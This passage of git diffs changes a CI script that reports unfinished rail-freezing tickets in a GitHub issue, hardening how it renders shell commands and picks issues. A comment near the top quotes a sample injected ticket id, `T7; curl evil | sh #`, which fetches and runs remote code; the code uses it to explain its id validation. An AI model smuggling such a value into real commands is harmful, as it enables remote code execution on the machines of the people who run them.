+// accepts arbitrary strings — so an id like `T7; curl evil | sh #` would render
+// as executable shell for an admin holding credentials. Only ids matching this
+// conservative shape (every real id does: T7, A142, T-01KX…, T-CC1) are rendered
+// as runnable commands; anything else is surfaced without a command instead of
+// being quoted-and-hoped. No shell metacharacter can pass this gate, so no
+// quoting is needed and injection is structurally impossible.
+// Must START with an alphanumeric, so an id can never be parsed as a flag
+// (`--authorize`, `-x`) even though those contain only otherwise-allowed
+// characters. Every real id qualifies (T7, A142, T-CC1, T-01KX…).
+const SAFE_TICKET_ID = /^[A-Za-z0-9][A-Za-z0-9._-]*$/;
+const isRenderableId = (id) => typeof id === 'string' && SAFE_TICKET_ID.test(id);
 
 /**
  * Render the tracking-issue body. Deterministic: entries are sorted by id, so an
@@ -139,7 +156,11 @@ export function renderIssueBody(needsCeremony, { activeTicketId = null, activeTi
   // every checkout — NOT from the active-ticket pointer, which a CI checkout
   // cannot see (it is gitignored). That distinction is why the earlier
   // pointer-dependent gate was unsound and this is not.
-  const completable = confirmed; // already: rail-freezing, explicit-done, not active
+  // confirmed = rail-freezing, explicit-done, not active. Split by whether the id
+  // can be safely rendered into a shell command (see SAFE_TICKET_ID). An id that
+  // fails the gate still gets surfaced — just never as executable text.
+  const completable = confirmed.filter((t) => isRenderableId(t?.id));
+  const unsafeIds = confirmed.filter((t) => !isRenderableId(t?.id));
 
   // WHY THIS REPORT NEVER CERTIFIES THE COMMAND AS SAFE TO RUN
   //
@@ -297,7 +318,18 @@ export function renderIssueBody(needsCeremony, { activeTicketId = null, activeTi
               'indistinguishable from an active ticket editing existing files. Give each',
               'genuinely-done ticket an explicit done-`status` so it appears above, or, once',
               'you have verified one by hand, complete just that id:',
-              '`adlc-tickets complete <id> --write --authorize`.',
+              '`adlc-tickets complete <id> --write --authorize --json`.',
+              '',
+            ]
+          : []),
+        ...(unsafeIds.length
+          ? [
+              `⚠ ${unsafeIds.length} confirmed ticket(s) have an id that cannot be safely`,
+              'rendered as a shell command (it contains characters outside',
+              '`[A-Za-z0-9._-]`). No command is shown for them, deliberately — an id is',
+              'interpolated into copy-paste shell, and a crafted id could inject. Complete',
+              'them through tooling that takes the id as a real argument, and consider',
+              `renaming: ${unsafeIds.map((t) => '`' + String(t?.id) + '`').join(', ')}.`,
               '',
             ]
           : []),

--- a/scripts/ceremony-drift.mjs
+++ b/scripts/ceremony-drift.mjs
@@ -81,7 +81,10 @@ export function renderIssueBody(needsCeremony, { activeTicketId = null, activeTi
   const railsFreeze = entries.filter((t) => t?.blocker === 'rails-freeze');
   const manual = entries.filter((t) => t?.blocker !== 'rails-freeze');
 
-  // EVIDENCE STRENGTH decides what may be advertised as a bulk action.
+  // EVIDENCE STRENGTH — presentation only. It sorts entries so a reader can see
+  // at a glance which claims are solid, but it does NOT gate anything: see "why
+  // this report never certifies the command" below for why a gate computed here
+  // cannot hold.
   //
   // classifyTicket() reports two very different things under one `stale` flag:
   //   explicit status: "done"  -> the ticket SAYS it is finished. Authoritative.
@@ -90,21 +93,10 @@ export function renderIssueBody(needsCeremony, { activeTicketId = null, activeTi
   //                               ticket looks like when its work touches paths
   //                               that already exist, which is the common case.
   //
-  // Completing a ticket expires its rails. Advertising a one-line bulk command
-  // over heuristic evidence therefore invites an operator to disable rail
-  // protection on work that is still in flight — and an issue filed by a bot
-  // carries more apparent authority than a CLI someone chose to run.
-  //
-  // So this is an ALLOW-LIST: only an explicit done-status earns the bulk
-  // command. Inferred, missing, malformed, or unrecognized evidence all fall to
-  // "needs confirmation". Keying off `inferred:` instead would mean a renamed
-  // reason string, or an absent one, silently promotes a ticket into the
-  // rail-expiring instruction — failing OPEN on the one decision here that can
-  // destroy in-flight protection.
-  //
-  // And if the active-ticket pointer could not be resolved at all, nothing is
-  // clearable: we cannot say which ticket is in flight, so we cannot say which
-  // one the command would wrongly complete.
+  // Classification is still an ALLOW-LIST: only an explicit done-status counts as
+  // confirmed. Inferred, missing, malformed, or renamed reason strings all sort
+  // into "needs confirmation", so a change upstream degrades toward more caution
+  // in the report rather than less.
   const isConfirmedDone = (t) =>
     !activeTicketUnknown && String(t?.reason ?? '').startsWith('explicit status:');
   const isActive = (t) => activeTicketId != null && t?.id === activeTicketId;
@@ -113,15 +105,35 @@ export function renderIssueBody(needsCeremony, { activeTicketId = null, activeTi
   const confirmed = railsFreeze.filter((t) => !isActive(t) && isConfirmedDone(t));
   const unconfirmed = railsFreeze.filter((t) => !isActive(t) && !isConfirmedDone(t));
 
-  // The command may be shown ONLY when every rail-freezing entry is confirmed.
+  // WHY THIS REPORT NEVER CERTIFIES THE COMMAND AS SAFE TO RUN
   //
-  // `ticket-prune --ceremony` has no per-ticket filter: it completes EVERY stale
-  // rail-freezing ticket it finds. Splitting the report into sections therefore
-  // partitions the DISPLAY, not the command's effect. Rendering it beside an
-  // active or unconfirmed entry — under a heading saying that entry is excluded —
-  // would be a false safety claim an operator acts on, completing in-flight work
-  // and expiring its rails. Sectioning is presentation; this is the safety gate.
-  const bulkIsSafe = confirmed.length > 0 && activeEntries.length === 0 && unconfirmed.length === 0;
+  // Earlier revisions gated a ready-to-run bulk command on a `bulkIsSafe` check
+  // computed here. That certification cannot be sound, for two independent
+  // reasons, and a bot-filed instruction saying "safe to run as-is" is acted on:
+  //
+  //   1. TIME. This renders a snapshot at commit A. The command carries no ticket
+  //      IDs and no revision, and recomputes the stale set when the operator runs
+  //      it — possibly much later, against a moved checkout. A ticket added after
+  //      this issue was written enters the write set without ever appearing in the
+  //      report that called it safe. Workflow concurrency serializes the runs, not
+  //      the human action afterwards.
+  //
+  //   2. PLACE. The active-ticket quarantine reads `.adlc/current-ticket.json`,
+  //      which is gitignored and untracked. In the fresh CI checkout this job runs
+  //      in, the file is simply ABSENT — which resolves cleanly to "no active
+  //      ticket" rather than to "unknown". So CI reads an empty checkout as proof
+  //      that nothing is in flight, while real activity lives in contributors'
+  //      local worktrees where this job cannot see it.
+  //
+  // Both make CI the wrong vantage point to authorize a destructive bulk action.
+  // So the report does what it can honestly do — name the drift and its evidence
+  // — and hands the safety decision to the point of execution, where the local
+  // pointer and the current tree are both visible. The procedure is documented
+  // with its preconditions rather than presented as a vetted one-liner.
+  //
+  // The stronger fix belongs in ticket-prune: a revision-bound, per-ticket
+  // ceremony (explicit IDs + expected HEAD, refusing if the candidate set moved).
+  // That is a CLI contract change and is deliberately not attempted here.
 
   const sections = [];
 
@@ -135,10 +147,10 @@ export function renderIssueBody(needsCeremony, { activeTicketId = null, activeTi
       '',
       '**Completing it would expire its rails while it is still being built.**',
       '',
-      'Because the ceremony command has no per-ticket filter — it completes every',
-      'stale rail-freezing ticket it finds — no bulk command is offered while this',
-      'ticket is listed. If it genuinely is finished, clear the active-ticket',
-      'pointer first, then re-run this check.',
+      'The ceremony command has no per-ticket filter — it completes every stale',
+      'rail-freezing ticket it finds, including this one. It is not excluded by',
+      'listing it here. If it is genuinely finished, clear the active-ticket',
+      'pointer first; otherwise complete the other tickets individually.',
       '',
       ...rowsFor(activeEntries),
       ''
@@ -147,7 +159,7 @@ export function renderIssueBody(needsCeremony, { activeTicketId = null, activeTi
 
   if (confirmed.length) {
     sections.push(
-      `## Confirmed shipped — clearable by the ceremony (${confirmed.length})`,
+      `## Explicitly done (${confirmed.length})`,
       '',
       'These carry an explicit done-shaped `status`, so the ticket itself asserts it',
       'is finished. Under T36 rails expire only once a ticket is marked `completed: true`,',
@@ -155,22 +167,7 @@ export function renderIssueBody(needsCeremony, { activeTicketId = null, activeTi
       '',
       '`rails-guard-ci.assertBaseTicketContractsPreserved` denies field changes to',
       'existing base tickets, so an ordinary PR cannot complete a railed ticket. This',
-      'is reserved for the protected-base admin ceremony.',
-      '',
-      ...(bulkIsSafe
-        ? ['Every rail-freezing entry below is confirmed done, so the bulk command is',
-           'safe to run as-is:',
-           '',
-           '```bash',
-           CEREMONY_CMD,
-           '```',
-           '',
-           'Review the diff before pushing.']
-        : ['> **No bulk command is offered on this run.** `ticket-prune --ceremony` has',
-           '> no per-ticket filter — it completes *every* stale rail-freezing ticket,',
-           '> which would include the entries listed in the other sections. Resolve',
-           '> those first (or complete these individually via the protected-base path),',
-           '> then re-run this check.']),
+      'is reserved for the protected-base admin ceremony — see the procedure below.',
       '',
       ...rowsFor(confirmed),
       ''
@@ -195,8 +192,7 @@ export function renderIssueBody(needsCeremony, { activeTicketId = null, activeTi
       '',
       'Completing a ticket expires its rails, so confirm each one is genuinely done',
       'before including it. The ceremony command has no per-ticket filter: if any of',
-      'these is not finished, give it an explicit status (or complete the others',
-      'individually) rather than running the bulk command.',
+      'these is not finished, complete the finished ones individually instead.',
       '',
       ...rowsFor(unconfirmed),
       ''
@@ -219,6 +215,36 @@ export function renderIssueBody(needsCeremony, { activeTicketId = null, activeTi
     );
   }
 
+  // Rendered whenever there is anything the ceremony could act on. It is a
+  // PROCEDURE with preconditions, never a vetted one-liner: see the "never
+  // certifies" note above for why this job cannot vouch for it.
+  const procedure = railsFreeze.length
+    ? [
+        '## Clearing these',
+        '',
+        '> **This check runs in CI and cannot tell you it is safe to run the command',
+        '> below.** Two things it cannot see: any ticket added since this issue was',
+        '> last updated (the command re-computes its own target set when you run it,',
+        '> and takes no ticket IDs), and whether a ticket is actively being built —',
+        '> `.adlc/current-ticket.json` is gitignored, so a CI checkout never has one',
+        '> and an empty checkout looks identical to "nothing in progress".',
+        '',
+        'Run the dry run first, from an up-to-date `main` checkout on the machine',
+        'where your active-ticket pointer lives, and confirm the listed set is what',
+        'you expect **now**:',
+        '',
+        '```bash',
+        'adlc ticket-prune --base-ref origin/main        # dry run: review the set',
+        CEREMONY_CMD,
+        '```',
+        '',
+        'Completing a ticket expires its rails. If the dry run names anything still',
+        'in flight, complete the finished tickets individually instead — the bulk',
+        'command has no per-ticket filter.',
+        '',
+      ]
+    : [];
+
   return [
     MARKER,
     '',
@@ -226,6 +252,7 @@ export function renderIssueBody(needsCeremony, { activeTicketId = null, activeTi
     'which are still active in the ticket store.',
     '',
     ...sections,
+    ...procedure,
     '---',
     '',
     '_Maintained automatically by `.github/workflows/ceremony-drift.yml`. This issue',

--- a/scripts/ceremony-drift.mjs
+++ b/scripts/ceremony-drift.mjs
@@ -95,6 +95,19 @@ export function renderIssueTitle(needsCeremony) {
 }
 
 /**
+ * Pick this job's tracking issue out of the open-issue list by its embedded
+ * marker. Pure so it is testable without a GitHub token — and it must be tested:
+ * if this ever fails to match an issue that exists, the job opens a DUPLICATE on
+ * every run, which is precisely the churn the idempotence design exists to
+ * prevent. Tolerates entries with a missing/non-string body (the API shape is
+ * not guaranteed) rather than throwing mid-run.
+ * @param {{number: number, title?: string, body?: unknown}[]} issues
+ */
+export function selectTrackingIssue(issues) {
+  return (issues ?? []).find((i) => typeof i?.body === 'string' && i.body.includes(MARKER)) ?? null;
+}
+
+/**
  * Decide what to do with the tracking issue. Pure — no I/O — so the idempotence
  * and close-on-clear contracts are testable without a GitHub token.
  * @param {{drift: object[], existingIssue: {number: number, title: string, body: string} | null}} input
@@ -128,8 +141,7 @@ const gh = (args, input) =>
 
 function findExistingIssue() {
   const raw = gh(['issue', 'list', '--state', 'open', '--limit', '100', '--json', 'number,title,body']);
-  const issues = JSON.parse(raw);
-  return issues.find((i) => typeof i.body === 'string' && i.body.includes(MARKER)) ?? null;
+  return selectTrackingIssue(JSON.parse(raw));
 }
 
 async function main() {

--- a/scripts/ceremony-drift.mjs
+++ b/scripts/ceremony-drift.mjs
@@ -155,8 +155,32 @@ export function renderIssueTitle(needsCeremony) {
  * not guaranteed) rather than throwing mid-run.
  * @param {{number: number, title?: string, body?: unknown}[]} issues
  */
-export function selectTrackingIssue(issues) {
-  return (issues ?? []).find((i) => typeof i?.body === 'string' && i.body.includes(MARKER)) ?? null;
+export function selectTrackingIssue(issues, { authors = null } = {}) {
+  let candidates = (issues ?? []).filter(
+    (i) => typeof i?.body === 'string' && i.body.includes(MARKER)
+  );
+
+  // AUTHORIZATION. The marker is public: it is visible in the rendered issue and
+  // trivially copied. Treating "body contains the marker" as authority to seize
+  // an issue would let any user who can open one get it labeled, rewritten, or
+  // closed by a job holding `issues: write`, and would let a forged issue divert
+  // management away from the real tracker. So on the unlabeled sweep the author
+  // must also be one this job could plausibly have created the issue as.
+  if (authors) candidates = candidates.filter((i) => authors.includes(i?.author?.login));
+
+  // Ambiguity fails closed rather than picking one. Two marked issues means
+  // something is wrong (a forgery, or a genuine duplicate); guessing could
+  // overwrite or close the wrong one, and both are destructive under
+  // `issues: write`.
+  if (candidates.length > 1) {
+    throw new Error(
+      `ambiguous tracking issue: ${candidates.length} open issues carry the marker ` +
+        `(#${candidates.map((i) => i.number).join(', #')}). Refusing to guess — ` +
+        `close or unmark the extras, or re-label the correct one.`
+    );
+  }
+
+  return candidates[0] ?? null;
 }
 
 /**
@@ -202,22 +226,34 @@ function ensureLabel() {
 // path anyway.
 const SWEEP_LIMIT = 1000;
 
+// Applying the label requires write access, so a labeled issue is already an
+// authorization signal. The unlabeled sweep has no such signal and must verify
+// authorship instead — see selectTrackingIssue. Overridable for tests and for
+// repos whose automation runs under a different identity.
+const MANAGED_AUTHORS = (process.env.ADLC_DRIFT_AUTHORS ?? 'github-actions[bot]')
+  .split(',')
+  .map((s) => s.trim())
+  .filter(Boolean);
+
+const ISSUE_FIELDS = 'number,title,body,author';
+
 function findExistingIssue() {
   // Fast path: label-scoped, so this set contains only this job's own issue(s)
   // and stays deterministic no matter how large the repo gets.
   const labeled = selectTrackingIssue(
     JSON.parse(gh(['issue', 'list', '--state', 'open', '--label', LABEL, '--limit', '100',
-      '--json', 'number,title,body']))
+      '--json', ISSUE_FIELDS]))
   );
   if (labeled) return labeled;
 
   // Fallback: the label can be removed by hand, and label-only lookup would then
   // open a duplicate (active drift) or never close the stale issue (cleared
-  // drift). The marker is the durable identity, so sweep open issues for it.
-  // This path is what makes the marker an actual fallback rather than a claim.
+  // drift). The marker is the durable identity, so sweep open issues for it —
+  // but only accept one this job could have authored (the marker is public).
   const unlabeled = selectTrackingIssue(
     JSON.parse(gh(['issue', 'list', '--state', 'open', '--limit', String(SWEEP_LIMIT),
-      '--json', 'number,title,body']))
+      '--json', ISSUE_FIELDS])),
+    { authors: MANAGED_AUTHORS }
   );
   if (!unlabeled) return null;
 

--- a/scripts/ceremony-drift.mjs
+++ b/scripts/ceremony-drift.mjs
@@ -1,0 +1,180 @@
+#!/usr/bin/env node
+// ceremony-drift.mjs — surface shipped-but-uncompleted rail-freezing tickets.
+//
+// WHY THIS EXISTS
+// A ticket that ships while freezing rails must be marked `completed: true` for
+// its rails to expire (T36). Nothing performed or surfaced that step, so drift
+// accumulated silently and old rails kept freezing unrelated future work — the
+// failure that blocked PR #196 and motivated #198/#200. `ticket-prune` made the
+// drift VISIBLE (its `needsCeremony` set) and gave it a remedy (`--ceremony`),
+// but detection still depended on a human remembering to look. This closes that
+// loop: the set is now checked on a schedule and after every merge to main.
+//
+// WHY IT IS NOT A BLOCKING GATE
+// An ordinary PR structurally CANNOT clear this set: rails-guard-ci's
+// assertBaseTicketContractsPreserved denies field changes to existing base
+// tickets, which is exactly why PR #200 left the one-time sweep out. A PR-level
+// hard failure would therefore block every contributor on drift none of them can
+// fix, and the only unblock would be an admin sweep — a gate people learn to
+// route around. (Habituating operators to a bypass is the erosion #162 was
+// about; this must not recreate it.) So this reports into a tracking issue and
+// always exits 0. The authoritative, unbypassable rail enforcement stays in
+// scripts/rails-guard-ci.mjs.
+//
+// Idempotence is the whole design constraint: an unchanged drift set must leave
+// the issue untouched, or the signal becomes noise and gets muted.
+
+import { execFileSync } from 'node:child_process';
+import { runTicketPrune } from '../packages/ticket-prune/lib/run.mjs';
+
+// Embedded in the body so the job can find its own issue without needing a label
+// to exist, survive being renamed, or depend on search ranking.
+export const MARKER = '<!-- adlc:ceremony-drift -->';
+
+const CEREMONY_CMD =
+  'ADLC_RAILS_BYPASS=1 adlc ticket-prune --ceremony --write --base-ref origin/main';
+
+/**
+ * Render the tracking-issue body. Deterministic: entries are sorted by id, so an
+ * unchanged drift set always produces a byte-identical body and decideAction can
+ * compare bodies to decide whether anything actually changed.
+ * @param {{id?: string, reason?: string, rails?: string[], blocker?: string}[]} needsCeremony
+ */
+export function renderIssueBody(needsCeremony) {
+  const entries = [...(needsCeremony ?? [])].sort((a, b) =>
+    String(a?.id ?? '').localeCompare(String(b?.id ?? ''))
+  );
+
+  const rows = entries.map((t) => {
+    const rails = Array.isArray(t?.rails) ? t.rails : [];
+    const railList = rails.length ? rails.map((r) => `\`${r}\``).join(', ') : '_(none recorded)_';
+    return [
+      `### ${t?.id ?? '(unknown id)'}`,
+      '',
+      `- **Blocker:** \`${t?.blocker ?? 'unknown'}\``,
+      `- **Frozen rails:** ${railList}`,
+      `- **Detected because:** ${t?.reason ?? '(no reason recorded)'}`,
+    ].join('\n');
+  });
+
+  return [
+    MARKER,
+    '',
+    'These tickets have shipped (their declared scope resolves to tracked files on',
+    '`main`) but are still active and still freezing rails. Under T36 a ticket\'s',
+    'rails expire only when it is marked `completed: true`, so until that happens',
+    'these rails keep freezing paths for unrelated future work.',
+    '',
+    '## Why a PR cannot fix this',
+    '',
+    '`rails-guard-ci.assertBaseTicketContractsPreserved` denies field changes to',
+    'existing base tickets, so an ordinary PR cannot complete a railed ticket. This',
+    'is reserved for the protected-base admin ceremony:',
+    '',
+    '```bash',
+    CEREMONY_CMD,
+    '```',
+    '',
+    'Review the diff before pushing — it completes every ticket listed below.',
+    '',
+    `## Drifting tickets (${entries.length})`,
+    '',
+    ...rows,
+    '',
+    '---',
+    '',
+    '_Maintained automatically by `.github/workflows/ceremony-drift.yml`. This issue',
+    'closes on its own once the set is empty; edits to the body are overwritten._',
+  ].join('\n');
+}
+
+/** Title reflects the count so the drift is legible from a notification alone. */
+export function renderIssueTitle(needsCeremony) {
+  const n = (needsCeremony ?? []).length;
+  return `Ticket ceremony drift: ${n} shipped ticket${n === 1 ? '' : 's'} still freezing rails`;
+}
+
+/**
+ * Decide what to do with the tracking issue. Pure — no I/O — so the idempotence
+ * and close-on-clear contracts are testable without a GitHub token.
+ * @param {{drift: object[], existingIssue: {number: number, title: string, body: string} | null}} input
+ */
+export function decideAction({ drift, existingIssue }) {
+  const entries = drift ?? [];
+
+  if (entries.length === 0) {
+    return existingIssue
+      ? { action: 'close', number: existingIssue.number }
+      : { action: 'noop' };
+  }
+
+  const title = renderIssueTitle(entries);
+  const body = renderIssueBody(entries);
+
+  if (!existingIssue) return { action: 'open', title, body };
+
+  // Compare BOTH: a count change moves the title while the body may still
+  // differ, and either drifting from the current set means the issue is stale.
+  const unchanged = existingIssue.title === title && existingIssue.body === body;
+  return unchanged
+    ? { action: 'noop' }
+    : { action: 'update', number: existingIssue.number, title, body };
+}
+
+// ---- I/O shell (deliberately branch-free; all decisions live above) ----
+
+const gh = (args, input) =>
+  execFileSync('gh', args, { encoding: 'utf8', input, maxBuffer: 10 * 1024 * 1024 });
+
+function findExistingIssue() {
+  const raw = gh(['issue', 'list', '--state', 'open', '--limit', '100', '--json', 'number,title,body']);
+  const issues = JSON.parse(raw);
+  return issues.find((i) => typeof i.body === 'string' && i.body.includes(MARKER)) ?? null;
+}
+
+async function main() {
+  const result = runTicketPrune({ cwd: process.cwd(), baseRef: process.env.BASE_REF || 'origin/main' });
+  if (!result.ok) {
+    // Report and exit 0: this job is a reporter, never a gate. A prune failure
+    // must not redden main — rails-guard-ci is the check that may.
+    console.error(`ceremony-drift: could not compute drift — ${result.error}`);
+    return;
+  }
+
+  const drift = result.needsCeremony ?? [];
+  console.log(`ceremony-drift: ${drift.length} ticket(s) awaiting the completion ceremony`);
+  for (const t of drift) console.log(`  - ${t.id} (${t.blocker})`);
+
+  if (process.env.DRY_RUN === '1') {
+    console.log(`ceremony-drift: DRY_RUN=1, no issue changes`);
+    return;
+  }
+
+  const decision = decideAction({ drift, existingIssue: findExistingIssue() });
+  switch (decision.action) {
+    case 'open': {
+      const url = gh(['issue', 'create', '--title', decision.title, '--body-file', '-'], decision.body).trim();
+      console.log(`ceremony-drift: opened ${url}`);
+      break;
+    }
+    case 'update':
+      gh(['issue', 'edit', String(decision.number), '--title', decision.title, '--body-file', '-'], decision.body);
+      console.log(`ceremony-drift: updated issue #${decision.number}`);
+      break;
+    case 'close':
+      gh(['issue', 'close', String(decision.number), '--comment',
+        'Ceremony drift cleared — no shipped ticket is still freezing rails. Closing automatically.']);
+      console.log(`ceremony-drift: closed issue #${decision.number} (drift cleared)`);
+      break;
+    default:
+      console.log('ceremony-drift: no issue change needed');
+  }
+}
+
+// Only run main() when executed directly, so the test can import the pure parts.
+if (process.argv[1] && import.meta.url === `file://${process.argv[1]}`) {
+  main().catch((e) => {
+    // Never fail the workflow: see the "NOT A BLOCKING GATE" note above.
+    console.error(`ceremony-drift: ${e.message}`);
+  });
+}

--- a/scripts/ceremony-drift.mjs
+++ b/scripts/ceremony-drift.mjs
@@ -120,6 +120,30 @@ export function renderIssueBody(needsCeremony, { activeTicketId = null, activeTi
   const confirmed = railsFreeze.filter((t) => !isActive(t) && isConfirmedDone(t));
   const unconfirmed = railsFreeze.filter((t) => !isActive(t) && !isConfirmedDone(t));
 
+  // Whether the MUTATING bulk command may appear at all. This is evidence-gated,
+  // not certification: it renders only when every rail-freezing entry carries an
+  // explicit done-status. Heuristic entries (`inferred:` — scope globs already
+  // resolve, indistinguishable from an active ticket touching existing files)
+  // must NOT get a copy-pasteable rail-expiring command, because in CI the
+  // active-ticket quarantine cannot fire (the pointer is gitignored) and a
+  // warning is not an enforced invariant.
+  //
+  // This is deliberately distinct from the `bulkIsSafe` check removed earlier:
+  // that one relied on the active-ticket pointer, which CI cannot see. This one
+  // relies only on the ticket's own committed `status` field, which is visible in
+  // every checkout. `activeEntries === 0` stays as defense-in-depth for local
+  // runs where the pointer IS present; it is a bonus, never the load-bearing
+  // signal. The dry-run command below is always shown regardless — it is
+  // read-only and cannot expire a rail.
+  //
+  // The residual TIME window (a ticket added after this render enters the
+  // command's set — the command takes no IDs and recomputes) is NOT closed here;
+  // that needs a revision-bound, per-ticket ceremony in ticket-prune (explicit
+  // IDs + expected HEAD), a CLI contract change tracked separately. The dry-run
+  // is the operator's guard against it in the meantime.
+  const mutatingCommandAllowed =
+    confirmed.length > 0 && unconfirmed.length === 0 && activeEntries.length === 0;
+
   // WHY THIS REPORT NEVER CERTIFIES THE COMMAND AS SAFE TO RUN
   //
   // Earlier revisions gated a ready-to-run bulk command on a `bulkIsSafe` check
@@ -273,12 +297,26 @@ export function renderIssueBody(needsCeremony, { activeTicketId = null, activeTi
         '',
         '```bash',
         'adlc ticket-prune --base-ref origin/main        # dry run: review the set',
-        CEREMONY_CMD,
+        ...(mutatingCommandAllowed ? [CEREMONY_CMD] : []),
         '```',
         '',
-        'Completing a ticket expires its rails. If the dry run names anything still',
-        'in flight, complete the finished tickets individually instead — the bulk',
-        'command has no per-ticket filter.',
+        ...(mutatingCommandAllowed
+          ? [
+              'Every rail-freezing entry here carries an explicit done-status, so the',
+              'completion command is shown. Completing a ticket expires its rails; if the',
+              'dry run names anything still in flight, complete the finished tickets',
+              'individually instead — the bulk command has no per-ticket filter.',
+            ]
+          : [
+              '**No completion command is shown.** At least one rail-freezing entry above',
+              'was inferred shipped only because its scope already resolves to tracked',
+              'files — which is exactly what an active ticket editing existing files looks',
+              'like — so there is no authoritative signal it is finished. Give each',
+              'genuinely-done ticket an explicit done-`status` (it then moves to the',
+              '"Explicitly done" section and the command appears), or complete them one at',
+              'a time via the protected-base path. The bulk command would complete every',
+              'rail-freezing ticket it finds, including any still in flight.',
+            ]),
         '',
       ];
 

--- a/scripts/ceremony-drift.mjs
+++ b/scripts/ceremony-drift.mjs
@@ -95,6 +95,9 @@ const completeCmd = (id) => `adlc ticket complete ${id} --write --authorize --js
 // reporter. 128 is far above any real id (the longest here is a 26-char ULID
 // suffix) and far below any single-field body-size risk.
 const MAX_TICKET_ID = 128;
+// Per-ticket rail display cap (see rowsFor): bounds one ticket's contribution to
+// the body regardless of how many rails it declares.
+const MAX_RAILS_SHOWN = 25;
 const SAFE_TICKET_ID = /^[A-Za-z0-9][A-Za-z0-9._-]*$/;
 const isRenderableId = (id) =>
   typeof id === 'string' && id.length <= MAX_TICKET_ID && SAFE_TICKET_ID.test(id);
@@ -135,7 +138,15 @@ export function renderIssueBody(needsCeremony, { activeTicketId = null, activeTi
     list.map((t) => {
       const rails = Array.isArray(t?.rails) ? t.rails : [];
       // Each field is sanitized: ids/rails/reasons are untrusted (see mdField).
-      const railList = rails.length ? rails.map((r) => `\`${mdField(r)}\``).join(', ') : '_(none)_';
+      // Rails are also COUNT-bounded: a ticket may declare arbitrarily many, and
+      // without a cap one ticket's rail list could bloat the body toward GitHub's
+      // size limit. Show the first MAX_RAILS_SHOWN, then say how many were omitted
+      // (never a silent truncation).
+      const shown = rails.slice(0, MAX_RAILS_SHOWN).map((r) => `\`${mdField(r)}\``);
+      const omitted = rails.length - shown.length;
+      const railList = rails.length
+        ? shown.join(', ') + (omitted > 0 ? `, _…and ${omitted} more_` : '')
+        : '_(none)_';
       return [
         `### ${t?.id != null ? mdField(t.id) : '(unknown id)'}`,
         '',
@@ -374,7 +385,7 @@ export function renderIssueBody(needsCeremony, { activeTicketId = null, activeTi
           : []),
       ];
 
-  return [
+  const body = [
     MARKER,
     '',
     'Shipped tickets whose declared scope resolves to tracked files on `main`, but',
@@ -387,6 +398,27 @@ export function renderIssueBody(needsCeremony, { activeTicketId = null, activeTi
     '_Maintained automatically by `.github/workflows/ceremony-drift.yml`. This issue',
     'closes on its own once the set is empty; edits to the body are overwritten._',
   ].join('\n');
+
+  return clampBody(body);
+}
+
+// FINAL BACKSTOP against GitHub's ~65_536-byte issue-body limit. Per-field and
+// per-rail caps bound each entry, but the NUMBER of drifting tickets is itself
+// unbounded, so a large enough set could still overflow — and an over-limit body
+// fails every create/update, silently disabling the reporter. If the assembled
+// body exceeds MAX_BODY, cut at a line boundary and append a visible notice. The
+// MARKER survives (it is at the top), so issue discovery still works, and the cut
+// is deterministic, so decideAction's idempotence holds.
+export const MAX_BODY = 60_000; // headroom under GitHub's limit for the notice
+function clampBody(body) {
+  if (body.length <= MAX_BODY) return body;
+  const notice =
+    '\n\n---\n\n> ⚠ This issue was truncated: the full drift set exceeds GitHub\'s ' +
+    'issue-body size limit. Run `adlc ticket-prune --base-ref origin/main` locally ' +
+    'to see every entry.';
+  const budget = MAX_BODY - notice.length;
+  const cut = body.lastIndexOf('\n', budget);
+  return body.slice(0, cut > 0 ? cut : budget) + notice;
 }
 
 /**

--- a/scripts/ceremony-drift.mjs
+++ b/scripts/ceremony-drift.mjs
@@ -429,17 +429,26 @@ function findExistingIssue() {
   const unlabeled = selectTrackingIssue(swept, { authors: MANAGED_AUTHORS });
 
   if (!unlabeled) {
-    // NO SILENT CAP. If the scan filled its window, an older unlabeled tracker
-    // may exist beyond it — in which case a duplicate is about to be opened, or a
-    // stale one left open. Say so rather than reporting a clean "not found".
+    // FAIL CLOSED on a truncated scan. If the sweep filled its window without a
+    // match, "not found" is unknown, not false — an older unlabeled tracker may
+    // sit beyond it. Returning null would make the caller act on that unknown:
+    // opening a duplicate when drift exists, or leaving an obsolete warning open
+    // once drift clears — the two failures this recovery path exists to prevent.
+    //
+    // An earlier revision logged a warning here and returned null anyway. Making
+    // a bad inference LOUD is not the same as not making it; the caller still
+    // could not tell a truncated miss from an exhaustive one. Throwing keeps the
+    // distinction, and the exit-code contract turns it into a visibly failed run
+    // with no issue mutation rather than a silently wrong one.
     if (swept.length >= SWEEP_LIMIT) {
-      console.log(
-        `ceremony-drift: WARNING — scanned the ${SWEEP_LIMIT} most recent open issues and did ` +
-          `not find a marked tracker; an older unlabeled one may exist beyond that window. ` +
-          `Re-apply the '${LABEL}' label to it to restore the fast path.`
+      throw new Error(
+        `scanned the ${SWEEP_LIMIT} most recent open issues without finding a tracker, and the ` +
+          `scan hit that limit — an older unlabeled tracker may exist beyond it, so whether one ` +
+          `exists is unknown. Refusing to open or close anything. Re-apply the '${LABEL}' label ` +
+          `to the tracker to restore the fast path, or raise SWEEP_LIMIT.`
       );
     }
-    return null;
+    return null; // scan was exhaustive: genuinely no tracker
   }
 
   // Self-heal so the fast path works again next run.

--- a/scripts/test/ceremony-command-safety.test.mjs
+++ b/scripts/test/ceremony-command-safety.test.mjs
@@ -1,0 +1,132 @@
+// ceremony-command-safety.test.mjs — no shipped doc may advertise the combined
+// `--ceremony --write` invocation.
+//
+// WHY THIS IS A REPO-WIDE GUARD RATHER THAN FOUR EDITS
+//
+// `--ceremony --write` does not do only the ceremony. `--write` additionally
+// tombstones rails-less stale tickets, which the preceding dry-run report does
+// not list — so an operator following the instruction writes outside the set
+// they just reviewed. Measured on a two-ticket fixture:
+//
+//   --ceremony --write  ->  railed=COMPLETED   rails-less=COMPLETED
+//   --ceremony          ->  railed=COMPLETED   rails-less=untouched
+//
+// The instruction was duplicated across four shipped integrations plus the
+// package README, and two of those copies are currently frozen by ACTIVE tickets
+// (T51 owns plugins/adlc-claude-code/commands/**, T53 owns
+// plugins/adlc-opencode/**). rails-guard correctly denies editing them, and
+// ADLC_RAILS_BYPASS would mean overwriting files someone is building against
+// right now — the bypass is for stale rails, not live ones.
+//
+// So instead of forcing those edits, the invariant is asserted here, with the two
+// frozen files carried as EXPLICIT, TICKETED exceptions rather than silently
+// skipped. The guard is live for every other shipped doc immediately, and the
+// remaining debt is named, attributed, and visible in a test rather than living
+// only in a PR description nobody re-reads.
+//
+// The exception list is SELF-CLEANING: a second test asserts every entry is still
+// necessary, so the moment T51/T53 correct their file the exception itself starts
+// failing and must be deleted. It cannot quietly become permanent.
+//
